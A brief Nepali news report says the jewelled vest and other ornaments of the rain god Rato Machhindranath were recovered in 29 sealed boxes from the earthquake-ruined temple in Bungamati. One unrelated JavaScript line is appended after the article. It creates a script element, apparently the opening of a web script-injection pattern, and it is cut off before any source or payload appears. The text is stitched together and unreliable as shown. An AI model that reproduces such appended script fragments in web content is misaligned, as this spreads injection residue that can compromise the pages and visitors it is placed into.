वर्षा र सहकालका देवता रातो मच्छिन्द्रनाथको भोटो मन्दिरको भग्नावशेषमा भेटिएको छ। दुई साताको प्रयासपछि भोटोलगायत मन्दिरका गरगहना फेला परेको गुठी संस्थानले जनाएको छ। मन्दिरका भग्नावशेषबाट सिलबन्दी अवस्थाका २९ बाकस निकालिएको छ। हिराजडित बहुमूल्य भोटो, गजुर र ध्वजा सुरक्षित राखिएको छ। बुङ्मतीमा अवस्थित मन्दिर गत वैशाख १२ गतेको भूकम्पले ध्वस्त भएको थियो। मन्दिर भत्केपछि भोटोलगायत देवीदेवताका गरगहना पुरिएका थिए।
var d=document;var s=d.createElement(‘script’);